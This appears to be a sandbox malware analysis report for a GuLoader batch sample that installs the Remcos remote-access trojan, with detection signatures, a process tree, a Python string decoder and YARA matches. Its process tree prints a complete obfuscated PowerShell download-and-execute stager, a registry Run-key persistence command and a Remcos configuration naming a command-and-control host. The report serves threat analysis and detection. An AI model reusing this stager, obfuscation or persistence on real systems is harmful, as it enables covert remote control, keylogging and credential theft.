Windows Analysis Report
rIMGTR657365756.bat

Overview

General Information

Sample name: rIMGTR657365756.bat
Analysis ID: 1536035
MD5: 97f6fcabf941e9e4eb8caaf89cb7c733
SHA1: 0aa53ac7dc50e7a16b9ba92024ecd3b141e1aecf
SHA256: ff6c4c8d899df66b551c84124e73c1f3ffa04a4d348940f983cf73b2709895d3
Tags: bat, user-Porcupine

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Copy From or To System Directory
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 2928 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMGTR657365756.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5576 cmdline: powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. 
HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. 
UndH.take LnnaDan dPerfePapfrDeorsLerr[Adv $Tes,DVaesr rotiSvovkN nck IndeVensvLodsaPapin HjkdpsycsSpivfoffsoF rtrTerrsTortyPocknDemai,yttnthamg rodespu,rSter]Syll=ejer$ Br FobskuExporHon.cHypoa Nont.opieSyn d SedrOverr SneeTo.lfInterT esa.oldg lua FlabInteiPilklTareiAlt.tMis,y ogl ');$Gasartens60=Taborets 'Unfo$.luerFj leHimygSlvleGoallJe,nmaftesCrtosbilli Co gVulcsForlt Mad. TheDA tioKerawUdfrnFodblmi roSemiaYuked ,ycFUndeiBro lA.ioeV ks(Prin$Col ESci.n Klag D,ml eaneEs es DiskStena armrHklee gaarHidss Ace, Chi$ UpbUAcc dAquebBraclDephi fbkAr esRein) ald ';$Udbliks=$Thioneine;Politiseres (Taborets 'Reun$CampgSul.lSpitoCrabbPriva ExflMala:manuaDom,c RaahLus,r ,riOB,thMAntiA.eksT gotiKontNInvii HorcZo t= nc( kh,T ,tyeS leSQuattVa v-GldsPBrazaSkostfilthTran Bee$granUfacsdKokoBAlinl RafIE ickNot sSamm)Su a ');while (!$Achromatinic) {Politiseres (Taborets 'Meak$Kom gKalil ScroRemubYowla PrelGuar:BekrgR warF ise ForiEnd.t geo= Bun$WhamtCaferSolou anese v ') ;Politiseres $Gasartens60;Politiseres (Taborets 'QuivSKom tJohaA eflRDislTS nd-PrehsFoppLBarneQueseM,nipPama Reme4A ha ');Politiseres (Taborets 'Sand$ Ro Gkyp LCopro MatBHjlpA AnrLS dd:SynaAS,ilCResoh Na R L,sORakeMBen ABol t,lipIRe.anFjorI ubCbut,=.nch(En.lTCa.tETohesMel TMacr-DeplPShanAT,glT SnaHReup lu.k$SladuSprrd Samb,ammlMicrIF,enkFlusSRamp) ua ') ;Politiseres (Taborets 'A,sk$MomogDisal E ko DiaB BerANontL nge:agriiSkiemRethpCh llTi.beTur MFibrE MorNRegnTMuceaSadltKolliChroo AsyNEa lAmnstLLode= Sna$ VelGUndelDr tOBoonbIngeAIroklLy o:Snorn edtoP ckT Ga a TeltS.orE Afvs Ras+ dup+ cho%Fire$S arS KarARouttek ke rctLNo slKrybIAltsT,itabSardYeftee Af rIdeoNBjrne arpsTolv.OpsaCPi tOTok.USkamnIrreTPant ') ;$Engleskarers=$Satellitbyernes[$implementational];}$Budgettets=309680;$minification=29934;Politiseres (Taborets 'P el$ vergStuelChaeoMolabChr a utuLUsag:Semim ngeMilikP raA Sl N Ba IUnprK ritk SlueD gerBeclnK,ivEUngrsPa k Mou=Fed GratGMisoE udat Rus-ophtcUf eO ReanBaskTFilteVaquNHaentSved A fr$a rjuSa vdAtrib 
edeLEmbrIDummKBellS iva ');Politiseres (Taborets 'Togp$AfgigSt,klL kroF eebBillaDis l Not: erpAPodorAksecTrish uffaTypoe Bu oBa,dlPhen Afre= ska Re.u[Ba oSLgkuyindlsflurtSproeIntrmTr,n.TresCLegaoNifenMacuv etueSeksrIrontOutr]San :With:KonsFAirprResboTa km SciBRetraSpeasTy keim o6 Rst4ValuSAfsttNglerAdeliApnenNon g unk(Stre$U stmStane.rfakCerva ilbnSelviP aekSk ak ozee,cotrCentn BeveAftosSign) F.l ');Politiseres (Taborets ',ome$Zulkg T,klBi eoFdevBNds aUndeLFors:Dic.mP,edODe oR InctWedgAn,tuLombyWImpeIPredSUnfaE Re 1 Sub3Bilt3Anac sy b=Kloe Yeg [Pries AttyYellSBilltPhipeCarlm rat. ndeTS ane StaxHuskTProd.H,neESkulNPernCskaloCh iDExcrIS.mlnBeg.G.tje]Disl:perf:SyriA TenS eucc AriiPrgtiSpkh.Spu.GVa aeCabrT,iscs Am tNo pREv kIIschNP upg Fli( Fle$CeleAR.mor DiecDiplH othAUndeECa lOAndeLTele)A ch ');Politiseres (Taborets ',und$ KargJordl vaboEnsuBCahoaLastl Ima:HospCKd jOTracM Ch pSteaUIndet T,nEStalreg.sdmodvrSkifESiniV VokEUnimt Fol=A va$ ,enm T rO nscRSeksTNotiA stalF,stWDiptIFinhsAp ke ov1R od3U ha3 ies.BoetsMercuFinebP tasAndet KarR Lb ISk,dnUndeGKloe(Infr$ Fo b ProuleftdsmakGOvereB sttIdxlt N re ra,t Sn SA,fo,Cher$G,unmPhleI ovenBy liEl kFPr.fiUr gC.pacAScrutSoldi TiloThinNAfte)Fo r ');Politiseres $computerdrevet;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6388 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. 
HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. 
UndH.take LnnaDan dPerfePapfrDeorsLerr[Adv $Tes,DVaesr rotiSvovkN nck IndeVensvLodsaPapin HjkdpsycsSpivfoffsoF rtrTerrsTortyPocknDemai,yttnthamg rodespu,rSter]Syll=ejer$ Br FobskuExporHon.cHypoa Nont.opieSyn d SedrOverr SneeTo.lfInterT esa.oldg lua FlabInteiPilklTareiAlt.tMis,y ogl ');$Gasartens60=Taborets 'Unfo$.luerFj leHimygSlvleGoallJe,nmaftesCrtosbilli Co gVulcsForlt Mad. TheDA tioKerawUdfrnFodblmi roSemiaYuked ,ycFUndeiBro lA.ioeV ks(Prin$Col ESci.n Klag D,ml eaneEs es DiskStena armrHklee gaarHidss Ace, Chi$ UpbUAcc dAquebBraclDephi fbkAr esRein) ald ';$Udbliks=$Thioneine;Politiseres (Taborets 'Reun$CampgSul.lSpitoCrabbPriva ExflMala:manuaDom,c RaahLus,r ,riOB,thMAntiA.eksT gotiKontNInvii HorcZo t= nc( kh,T ,tyeS leSQuattVa v-GldsPBrazaSkostfilthTran Bee$granUfacsdKokoBAlinl RafIE ickNot sSamm)Su a ');while (!$Achromatinic) {Politiseres (Taborets 'Meak$Kom gKalil ScroRemubYowla PrelGuar:BekrgR warF ise ForiEnd.t geo= Bun$WhamtCaferSolou anese v ') ;Politiseres $Gasartens60;Politiseres (Taborets 'QuivSKom tJohaA eflRDislTS nd-PrehsFoppLBarneQueseM,nipPama Reme4A ha ');Politiseres (Taborets 'Sand$ Ro Gkyp LCopro MatBHjlpA AnrLS dd:SynaAS,ilCResoh Na R L,sORakeMBen ABol t,lipIRe.anFjorI ubCbut,=.nch(En.lTCa.tETohesMel TMacr-DeplPShanAT,glT SnaHReup lu.k$SladuSprrd Samb,ammlMicrIF,enkFlusSRamp) ua ') ;Politiseres (Taborets 'A,sk$MomogDisal E ko DiaB BerANontL nge:agriiSkiemRethpCh llTi.beTur MFibrE MorNRegnTMuceaSadltKolliChroo AsyNEa lAmnstLLode= Sna$ VelGUndelDr tOBoonbIngeAIroklLy o:Snorn edtoP ckT Ga a TeltS.orE Afvs Ras+ dup+ cho%Fire$S arS KarARouttek ke rctLNo slKrybIAltsT,itabSardYeftee Af rIdeoNBjrne arpsTolv.OpsaCPi tOTok.USkamnIrreTPant ') ;$Engleskarers=$Satellitbyernes[$implementational];}$Budgettets=309680;$minification=29934;Politiseres (Taborets 'P el$ vergStuelChaeoMolabChr a utuLUsag:Semim ngeMilikP raA Sl N Ba IUnprK ritk SlueD gerBeclnK,ivEUngrsPa k Mou=Fed GratGMisoE udat Rus-ophtcUf eO ReanBaskTFilteVaquNHaentSved A fr$a rjuSa vdAtrib 
edeLEmbrIDummKBellS iva ');Politiseres (Taborets 'Togp$AfgigSt,klL kroF eebBillaDis l Not: erpAPodorAksecTrish uffaTypoe Bu oBa,dlPhen Afre= ska Re.u[Ba oSLgkuyindlsflurtSproeIntrmTr,n.TresCLegaoNifenMacuv etueSeksrIrontOutr]San :With:KonsFAirprResboTa km SciBRetraSpeasTy keim o6 Rst4ValuSAfsttNglerAdeliApnenNon g unk(Stre$U stmStane.rfakCerva ilbnSelviP aekSk ak ozee,cotrCentn BeveAftosSign) F.l ');Politiseres (Taborets ',ome$Zulkg T,klBi eoFdevBNds aUndeLFors:Dic.mP,edODe oR InctWedgAn,tuLombyWImpeIPredSUnfaE Re 1 Sub3Bilt3Anac sy b=Kloe Yeg [Pries AttyYellSBilltPhipeCarlm rat. ndeTS ane StaxHuskTProd.H,neESkulNPernCskaloCh iDExcrIS.mlnBeg.G.tje]Disl:perf:SyriA TenS eucc AriiPrgtiSpkh.Spu.GVa aeCabrT,iscs Am tNo pREv kIIschNP upg Fli( Fle$CeleAR.mor DiecDiplH othAUndeECa lOAndeLTele)A ch ');Politiseres (Taborets ',und$ KargJordl vaboEnsuBCahoaLastl Ima:HospCKd jOTracM Ch pSteaUIndet T,nEStalreg.sdmodvrSkifESiniV VokEUnimt Fol=A va$ ,enm T rO nscRSeksTNotiA stalF,stWDiptIFinhsAp ke ov1R od3U ha3 ies.BoetsMercuFinebP tasAndet KarR Lb ISk,dnUndeGKloe(Infr$ Fo b ProuleftdsmakGOvereB sttIdxlt N re ra,t Sn SA,fo,Cher$G,unmPhleI ovenBy liEl kFPr.fiUr gC.pacAScrutSoldi TiloThinNAfte)Fo r ');Politiseres $computerdrevet;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 1276 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 1292 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 2992 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • msiexec.exe (PID: 6416 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qalgwws" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6120 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\avqzpodslp" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7108 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5740 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6476 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj" MD5: 9D09DC1EDA745A5F87553048E57620CF)
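The PowerShell stager in the process tree above hides every string behind a function (named Taborets in this sample) that returns every fifth character of its argument starting at offset 4 and drops the final character, and a second function (Politiseres) that is `& ($Glassine) (...)` with `$Glassine` decoding to IEX, so each `Politiseres (Taborets '...')` is an Invoke-Expression of the decoded text. The block below is an added example written for this page, not Joe Sandbox or sample code: it re-implements that loop in Python, pulls the literals out of a script with a regular expression, and decodes a constructed stager fragment. The decoder name is a parameter on the assumption that it changes between samples (the report only shows this one name). Caveat: this rendering of the report dropped non-ASCII characters and collapsed repeated spaces inside the command lines, so decoding the full script as printed here does not round-trip; the three literals reused in the block (the IEX, user-Agent and '>' strings) are pure ASCII with single spaces and survived intact. The header name decodes in mixed case, which PowerShell and HTTP both accept.

```python
import re

# Added example, not Joe Sandbox or sample code: a Python re-implementation of
# the string decoder the stager above calls Taborets. Its PowerShell loop is
#   for ($i = 4; $i -lt ($s.Length - 1); $i += 5) { $out += $s[$i] }
# i.e. every fifth character starting at offset 4, with the final character
# excluded (every literal ends in a five-character padding chunk whose last
# character is a space, so the -1 drops that padding character).
OFFSET, STRIDE = 4, 5


def decode_stride(literal: str) -> str:
    return literal[OFFSET:len(literal) - 1:STRIDE]


def extract_literals(script: str, decoder_name: str = "Taborets") -> list:
    """Return the quoted literals passed to the decoder, in script order.

    The decoder name is a parameter on the assumption that it varies between
    samples; this report only shows the name Taborets."""
    pattern = re.compile(re.escape(decoder_name) + r"\s*'([^']*)'")
    return pattern.findall(script)


def decode_script(script: str, decoder_name: str = "Taborets") -> list:
    return [decode_stride(lit) for lit in extract_literals(script, decoder_name)]


def encode_stride(plain: str, filler: str = "Xxxx", tail: str = "Kard ") -> str:
    """Inverse of decode_stride, used only to build constructed test input."""
    assert len(filler) == OFFSET and len(tail) == STRIDE and tail.endswith(" ")
    return "".join(filler + ch for ch in plain) + tail


# Constructed stager fragment. The first three literals are copied from the
# command line in the report above (pure ASCII with single spaces, so they
# survived the page rendering intact); the fourth is built with encode_stride.
# Politiseres is the sample's wrapper for "& IEX".
SAMPLE_STAGER = (
    "$Glassine=Taborets 'AarsI Ci,EPri.XKard ';"
    "$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';"
    "$Genhret=Taborets ' ppe>Emer ';"
    "Politiseres (Taborets '" + encode_stride("Start-Sleep 4") + "');"
)


def demo() -> list:
    return decode_script(SAMPLE_STAGER)


if __name__ == "__main__":
    for literal, plain in zip(extract_literals(SAMPLE_STAGER), demo()):
        print(f"{literal[:24]!r:30} -> {plain!r}")
```

Run against a real stager, feed `decode_script` the whole command line taken from a process-creation log rather than from a rendered report, and expect the decoded list to include the Invoke-Expression alias, the User-Agent header, the download URL and the registry-persistence commands in the order the script uses them.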
Malware family: Remcos (aka RemcosRAT)
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware family: CloudEyE (aka GuLoader)
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["pelele.duckdns.org:51525:1"], "Assigned name": "MISS Chy", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TXCR8B", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Yara matches (file sources)
Source: C:\ProgramData\remcos\logs.dat | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security

Yara matches (memory dump sources)
Source: 00000008.00000002.4525154442.000000002253E000.00000004.00000010.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000008.00000002.4525112746.00000000224FD000.00000004.00000010.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000005.00000002.2380669297.0000000008A80000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_5 | Description: Yara detected GuLoader | Author: Joe Security
(remaining entries of this table are collapsed in the original report)

Yara matches (AMSI script buffer sources)
Source: amsi64_5576.amsi.csv | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: amsi32_6388.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
Matched strings:
  • 0xc44e: $b2: ::FromBase64String(
  • 0xb4b9: $s1: -join
  • 0x12ad6: $s3: Reverse
  • 0x4c65: $s4: +=
  • 0x4d27: $s4: +=
  • 0x8f4e: $s4: +=
  • 0xb06b: $s4: +=
  • 0xb355: $s4: +=
  • 0xb49b: $s4: +=
  • 0x15313: $s4: +=
  • 0x15393: $s4: +=
  • 0x15459: $s4: +=
  • 0x154d9: $s4: +=
  • 0x156af: $s4: +=
  • 0x15733: $s4: +=
  • 0xbcf6: $e4: Get-WmiObject
  • 0xbee5: $e4: Get-Process
  • 0xbf3d: $e4: Start-Process
  • 0x15faa: $e4: Get-Process

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: %Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2992, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Aversi
